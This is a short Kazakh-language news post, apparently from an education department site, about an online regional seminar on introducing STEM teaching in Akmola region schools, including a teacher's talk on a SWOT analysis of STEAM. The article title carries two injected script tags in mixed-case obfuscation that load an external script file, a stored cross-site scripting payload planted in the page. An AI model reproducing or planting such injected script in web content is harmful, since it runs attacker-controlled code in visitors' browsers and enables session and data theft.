ЖМЦ пәндерін ағылшын тілінде оқытатын Ақмола облысы мектептері педагогтерінің «Облыс мектептерінде STEM енгізу тәжірибесі және педагогикалық практика» облыстық онлайн семинары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2021

2021 жылдың 18 қарашасында ЖМЦ пәндерін ағылшын тілінде оқытатын аудан педагогтары облыстық онлайн семинарға қатысты.

Семинардың мақсаты: STEM - білім берудің алғашқы тәжірибесін Ақмола облысының мектептерінде оқыту практикасына енгізу мүмкіндіктерін талқылау.

Міндеттері: Ақмола облысының физика, химия, биология, информатика педагог – мұғалімдерін мектептердің оқу процесінің практикасына STEM - білім беруді енгізудің өзектілігі мен балама тәсілдерін талқылау процесіне тарту.

Сондай-ақ, семинарда «Отрадное ауылының жалпы білім беретін мектебі» КММ химия пәнінің мұғалімі Жанар Тасболатқызы Мыңбаева «Қазақстан Республикасының мектептерінде STEAM - оқытуды енгізудің келешегіне «SWOT- талдау: өзектілігі, мүмкіндіктері және тәуекелдер» тақырыбында сөз сөйледі.

Просмотров: 575


Пікір қосу



Деректерді қолтаңбаға қосу